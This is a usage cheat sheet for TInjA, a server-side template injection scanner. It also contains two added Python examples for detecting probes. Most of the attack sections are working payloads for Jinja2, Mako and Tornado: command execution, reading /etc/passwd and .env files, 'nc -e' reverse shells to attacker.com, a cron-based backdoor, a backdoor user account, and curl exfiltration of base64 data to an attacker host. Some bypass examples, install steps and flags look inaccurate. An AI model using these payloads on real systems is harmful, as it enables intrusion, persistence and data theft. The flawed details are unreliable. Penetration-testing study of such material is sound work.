# TInjA

## Overview

TInjA (Template Injection Analyzer) is a specialized tool for identifying and exploiting Server-Side Template Injection (SSTI) vulnerabilities in web applications. It tests various template engines, including Jinja2, Mako, Tornado, Genshi, Cheetah, and Twig, by injecting payloads and analyzing the responses to determine the template engine in use and the available exploit paths.

SSTI vulnerabilities allow attackers to inject template syntax into server-side template processors, potentially leading to arbitrary code execution, information disclosure, and complete system compromise.
## Installation

### From Kali Linux Repository

```bash
sudo apt-get update
sudo apt-get install tinja
```

### From Source

```bash
git clone https://github.com/Hackmanit/TInjA.git
cd TInjA
python3 -m pip install -r requirements.txt
```

### Docker

```bash
docker run -it kalilinux/kali-rolling tinja --help
```

### Python Package

```bash
pip3 install tinja
```
## Basic Usage

| Command | Purpose |
|---|---|
| `tinja -url URL` | Test single URL for SSTI |
| `tinja -u URL -p PARAM` | Test specific parameter |
| `tinja -l FILE` | Test URLs from file list |
| `tinja -o OUTPUT` | Save results to file |
| `tinja --engine ENGINE` | Target specific template engine |
| `tinja --exploit` | Generate exploitation payload |
## Command Options

### Target Specification

```bash
# Single URL testing
tinja -url "http://target.com/page?name=test"

# Specific parameter
tinja -url "http://target.com/page?name=test" -p name

# Custom HTTP method
tinja -url "http://target.com/api" --method POST

# POST data testing
tinja -url "http://target.com/form" --data "user=test&message=test"
```

### Advanced Options

```bash
# Custom headers
tinja -url "http://target.com" -H "Authorization: Bearer token"

# Proxy configuration
tinja -url "http://target.com" --proxy "http://127.0.0.1:8080"

# Disable SSL verification
tinja -url "https://target.com" --insecure

# Custom timeout
tinja -url "http://target.com" --timeout 30
```
## Template Engine Detection

### Detection Methods

```bash
# Automatic engine detection
tinja -url "http://target.com/page?user=test"

# The output shows the detected engine:
# [+] Detected Template Engine: Jinja2
# [+] Vulnerability Type: SSTI
```

| Template Engine | Common Parameters | Typical Frameworks / Applications |
|---|---|---|
| Jinja2 | name, user, search, message | Flask, Django |
| Mako | template, view, page | Pyramid, TurboGears |
| Tornado | item, id, message | Tornado framework |
| Genshi | template, data, content | TurboGears |
| Cheetah | query, template, content | Older Python apps |
| Twig | data, template, page | PHP applications |
| Freemarker | object, model, data | Java applications |

### Manual Engine Identification

```bash
# Test Jinja2-specific syntax
curl "http://target.com/page?user={{7*7}}"
# Jinja2 returns: 49

# Test Mako-specific syntax (single quotes keep the shell from treating ${...} as a parameter expansion)
curl 'http://target.com/page?user=${7*7}'
# Mako returns: 49

# Test ERB (Ruby) syntax
curl "http://target.com/page?user=<%=7*7%>"
# ERB returns: 49
```
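The response-classification logic behind the three manual probes above, written as an added example (this is not TInjA's code; all function names are this example's own). It takes the bodies returned for each probe plus a baseline body, and treats a probe as evaluated only when the product appears and the probe text itself does not; it also generalises the `7*7` check to arbitrary factors so that a page which already contains "49" does not produce a false positive.

```python
import html

# Delimiter families from the curl checks above and the probe template for each.
# Twig shares {{ }} with Jinja2, so a delimiter probe alone identifies the family;
# TInjA narrows to the exact engine with engine-specific probes.
FAMILIES = {
    "jinja2/twig": "{{%d*%d}}",
    "mako": "${%d*%d}",
    "erb": "<%%=%d*%d%%>",
}

def make_probes(a: int = 7, b: int = 7) -> dict:
    """Map each probe string to its family.  Large factors give a product that
    is unlikely to already appear on the page, a classic false-positive source."""
    return {tpl % (a, b): fam for fam, tpl in FAMILIES.items()}

def probe_evaluated(probe: str, body: str, expected: str) -> bool:
    """True only if the server computed the expression: the product is present
    and the probe itself is absent, raw or HTML-escaped.  A verbatim echo of the
    probe is ordinary reflection, not template evaluation."""
    if probe in body or html.escape(probe, quote=False) in body:
        return False
    return expected in body

def identify_engine(baseline: str, responses: dict, a: int = 7, b: int = 7):
    """baseline: body returned for a harmless value (e.g. ?user=test).
    responses: probe string -> body returned when that probe was sent.
    Returns the evaluating family, None if nothing evaluated, or "ambiguous"
    (product already on the page, or several probes fired: confirm manually)."""
    expected = str(a * b)
    if expected in baseline:
        return "ambiguous"
    hits = {fam for probe, fam in make_probes(a, b).items()
            if probe in responses and probe_evaluated(probe, responses[probe], expected)}
    if not hits:
        return None
    return hits.pop() if len(hits) == 1 else "ambiguous"

if __name__ == "__main__":
    # Constructed responses: only the {{ }} probe was evaluated.
    bodies = {"{{7*7}}": "Hello 49", "${7*7}": "Hello ${7*7}",
              "<%=7*7%>": "Hello &lt;%=7*7%&gt;"}
    print(identify_engine("Hello test", bodies))   # jinja2/twig
```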
## SSTI Payload Testing

### Mathematical Expressions

```bash
# Basic arithmetic test
tinja -url "http://target.com/page?name={{7*7}}"

# Boolean logic test
tinja -url "http://target.com/page?name={{1==1}}"

# String concatenation test
tinja -url "http://target.com/page?name={{'hello'+'world'}}"
```

### Blind SSTI Detection

```bash
# Time-based blind SSTI
tinja -url "http://target.com/page?name={{range(1000000)}}" --method GET

# String comparison blind test
tinja -url "http://target.com/page?name={%if 1==1%}A{%endif%}B"
# The response should differ from the baseline, indicating that the template was processed
```

### Filter Bypass Techniques

```
# Underscore bypass
{{request.__class__}}

# Bracket notation bypass
{{self[request.args.key]}}

# Concatenation bypass
{{"__cl"+"ass__"}}

# Unicode bypass
{{"__class__"}}

# Hex bypass
{{"\x5f\x5fclass\x5f\x5f"}}
```
## Code Execution Payloads

### Jinja2 Exploitation

```
# Access object attributes
{{config}}

# Command execution via the config object's globals
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

# Command execution via the cycler object's globals
{{cycler.__init__.__globals__['os'].popen('whoami').read()}}

# Read a value from a request parameter
{{''.join(request.args.get('cmd')|list)}}

# Reverse shell
tinja -url "http://target.com/page?cmd=nc -e /bin/sh attacker.com 4444"
```

### Mako Exploitation

```
# Expression injection
${os.popen('id').read()}

# Python code execution
<%
import os
os.system('whoami')
%>

# File access
${open('/etc/passwd').read()}
```

### Tornado Exploitation

```
# Basic RCE
{%set cmd='id'%}{%set result=os.popen(cmd).read()%}

# Module import
{%import os%}${os.popen('whoami').read()}
```
## Information Gathering

### Extract Configuration Data

```bash
# Get config variables
tinja -url "http://target.com/page?name={{config}}" --exploit

# Access environment
tinja -url "http://target.com/page?name={{environ}}" --exploit

# List available globals
tinja -url "http://target.com/page?name={{globals()}}"
```

### File Reading

```bash
# Read /etc/passwd
tinja -url "http://target.com/page?name={{open('/etc/passwd').read()}}"

# Read application files
tinja -url "http://target.com/page?name={{open('../../config.py').read()}}"

# Read environment files
tinja -url "http://target.com/page?name={{open('.env').read()}}"
```

### Source Code Disclosure

```bash
# Read template source
tinja -url "http://target.com/page?name={{self.module.__loader__.get_source(None, 'app')}}"

# Read Python files
tinja -url "http://target.com/page?name={{open('../app.py').read()}}"
```
## Exploitation Workflow

### Step-by-Step Exploitation

```bash
# 1. Identify vulnerability
tinja -url "http://target.com/page?user=test"

# 2. Detect template engine
# Output indicates Jinja2

# 3. Test basic payload
curl "http://target.com/page?user={{7*7}}"

# 4. Generate RCE payload
tinja -url "http://target.com/page?user=PAYLOAD" --exploit

# 5. Execute payload
curl "http://target.com/page?user={{cycler.__init__.__globals__['os'].popen('id').read()}}"

# 6. Establish reverse shell
curl "http://target.com/page?user={{cycler.__init__.__globals__['os'].popen('nc -e /bin/sh 192.168.1.100 4444').read()}}"
```

### Batch Testing from File

```bash
# Create URL list
cat > urls.txt << EOF
http://target.com/page?name=test
http://target.com/search?q=test
http://target.com/user?id=1
EOF

# Test all URLs
tinja -l urls.txt -o results.txt

# Review findings
cat results.txt
```
## Output Analysis

### Report Generation

```bash
# Save detailed report
tinja -url "http://target.com" -o report.txt

# JSON output format
tinja -url "http://target.com" -o report.json --format json

# HTML report
tinja -url "http://target.com" -o report.html --format html
```

### Report Contents

```bash
# View discovered vulnerabilities
grep -i "vulnerable\|ssti" report.txt

# Extract payload
grep -i "payload" report.txt

# List affected parameters
grep -i "parameter" report.txt
```
## Advanced Techniques

### Bypassing Input Filters

#### Bypassing Quotes

```
# Arithmetic test without quotes
{{7*7}}

# Using chr() function
{{chr(72)+chr(101)+chr(108)+chr(108)+chr(111)}}

# Using request.args
{{request.args.get('x')}}
```

#### Bypassing Blacklists

```
# Case manipulation
{{request|safe}}
{{REQUEST|safe}}

# Comment injection
{{request/*bypass*/}}

# Null byte injection
{{request\x00}}

# Unicode normalization
{{request}}
```

#### Concatenation Bypass

```
# Escaped concatenation
{{'__cla'+'ss__'}}

# Using format
{{'{}{}'.format('__class__')}}

# Using join
{{''.join(['__','class__'])}}
```

### WAF Evasion

```
# Obfuscate payload
{{().__class__.__bases__[0].__subclasses__()}}

# Use alternative methods
{{self.__init__.__globals__}}

# Fragment injection
{{requ
est}}

# Newline injection
{{request
.method}}
```

### Polyglot Payloads

```bash
# Works across multiple engines
{{7*7}}${7*7}<%= 7*7 %>

# Detects engine by response
tinja -url "http://target.com/page?name={{7*7}}" --engine auto
```
## Post-Exploitation

### Establish Persistence

```
# Create backdoor
tinja -url "http://target.com/page?name=PAYLOAD" --exploit

# Add cron job
{{os.popen('echo "* * * * * nc -e /bin/sh attacker.com 4444" | crontab -').read()}}

# Create user
{{os.popen('useradd -m -s /bin/bash backdoor').read()}}
```

### Data Exfiltration

```
# Read sensitive files
tinja -url "http://target.com/page?name={{open('/var/www/config.php').read()}}"

# Exfiltrate to attacker server
{{os.popen('curl http://attacker.com?data=$(cat /etc/passwd|base64)').read()}}

# Encode output
{{os.popen('cat /etc/passwd | base64').read()}}
```
## Defensive Bypass

### Template Sandbox Escape

```
# Access restricted globals
{{().__class__.__bases__[0].__subclasses__()}}

# Import modules in restricted environment
{{__import__('os').popen('id').read()}}

# Use __builtins__
{{__builtins__['eval']('7*7')}}
```

### Restricted Characters Bypass

```
# Avoid brackets
{{().__class__.__bases__.__getitem__(0)}}

# Use getattr
{{getattr(request, '__class__')}}

# Use globals
{{self.__init__.__globals__['__builtins__']}}
```
## Mitigation Verification

### Testing Fixes

```bash
# Verify input sanitization
tinja -url "http://target.com/page?name=<test>" -v

# Check output encoding
tinja -url "http://target.com/page?name={{7*7}}" -v

# Validate filter implementation
tinja -url "http://target.com/page?name={{__import__}}"
```
## Common Parameters to Test

```
# URL parameters
?name=test
?user=test
?search=test
?q=test
?id=1
?page=test

# POST fields
username=test
email=test
message=test
title=test
content=test
description=test

# Headers
User-Agent: test
Referer: test
X-Custom-Header: test
```
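The same parameters are where SSTI probes show up on the defending side. The following is an added detection example (not TInjA code; regex names, the log format and the sample log lines are all constructed for this example) that URL-decodes the request target from access-log lines and flags the template delimiters and introspection names used in the payloads on this page. It keys on delimiters rather than only on `__class__`, so the concatenation and hex-escape bypasses from the Filter Bypass section are still caught, at a lower severity.

```python
import re
from urllib.parse import unquote, unquote_plus

# Common Log Format request line: client, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Delimiters of the engine families listed above.  Matching on delimiters, not on
# "__class__", still fires when the name is split or hex-escaped (see Filter Bypass).
DELIMITERS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|<%=?.*?%>", re.S)
# Introspection names and process/file calls used by the payloads on this page.
INTROSPECTION = re.compile(
    r"__(?:class|globals|subclasses|import|builtins|init)__|\b(?:p?open|system)\b"
)

def decode(value: str) -> str:
    """Undo query-string encoding (including double-encoding) and \\xNN escapes."""
    value = unquote_plus(value)            # '+' -> space, %XX -> char
    prev = None
    while value != prev:                   # peel double-encoding (%2525 -> %25 -> %)
        prev, value = value, unquote(value)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)

def analyse_line(line: str):
    """Return a finding dict for an SSTI-looking request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode(m.group("target"))
    delim, intro = DELIMITERS.search(target), INTROSPECTION.search(target)
    if not delim and not intro:
        return None
    severity = "high" if delim and intro else "medium" if delim else "low"
    return {"ip": m.group("ip"), "status": m.group("status"),
            "target": target, "severity": severity}

def scan(log_text: str) -> list:
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]

# Constructed sample log: a benign request, the 7*7 probe, the hex/concatenation
# bypass payload, and a Mako-style file read.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /page?name=test HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2024:13:55:37 +0000] "GET /page?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 498
203.0.113.5 - - [10/Oct/2024:13:55:38 +0000] "GET /page?name=%7B%7B%22%5Cx5f%5Cx5fcl%22%2B%22ass%5Cx5f%5Cx5f%22%7D%7D HTTP/1.1" 200 610
198.51.100.7 - - [10/Oct/2024:13:56:01 +0000] "GET /search?q=%24%7Bopen('/etc/passwd').read()%7D HTTP/1.1" 500 0
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["target"])
```

Only the request line is visible in an access log; the POST fields and headers listed above need the same decoding and matching at the application or WAF layer, where the full request body is available.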
## Automation Scripts

### Continuous Testing

```bash
#!/bin/bash
# tinja-scan.sh - Automated SSTI scanning over every URL in urls.txt
while read -r url; do
    echo "[*] Testing: $url"
    tinja -url "$url" -o "results_$(date +%s).txt"
done < urls.txt
```

### Integration with Burp Suite

```bash
# Export Burp requests
# Use Burp to intercept requests
# Convert to tinja format for automated testing
tinja -l burp_export.txt -o burp_results.txt
```
## Troubleshooting

### Common Issues

| Issue | Solution |
|---|---|
| No detection on known vulnerable app | Try different parameters, adjust timeout |
| False positives | Verify manually with browser, increase precision |
| Connection timeout | Adjust timeout value, check proxy settings |
| SSL errors | Use `--insecure` flag for self-signed certs |
| No output | Check URL format, verify target is running |

### Debug Mode

```bash
# Verbose output
tinja -url "http://target.com" -v

# Show all requests
tinja -url "http://target.com" --debug

# Save traffic log
tinja -url "http://target.com" --log traffic.log
```
## Legal and Ethical Considerations

- Authorization Required: Only test systems you own or have explicit written permission to test
- Responsible Disclosure: Report findings to the vendor/organization before public disclosure
- Compliance: Follow OWASP testing guidelines and legal requirements
- Documentation: Maintain detailed records of all testing activities
- Scope Limitation: Stay within the defined testing scope and parameters

## Resources

- OWASP SSTI: https://owasp.org/www-community/Server-Side_Template_Injection
- HackTricks SSTI: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
- TInjA GitHub: https://github.com/Hackmanit/TInjA

TInjA is essential for comprehensive web application security assessments, helping to identify template injection vulnerabilities that can lead to complete system compromise.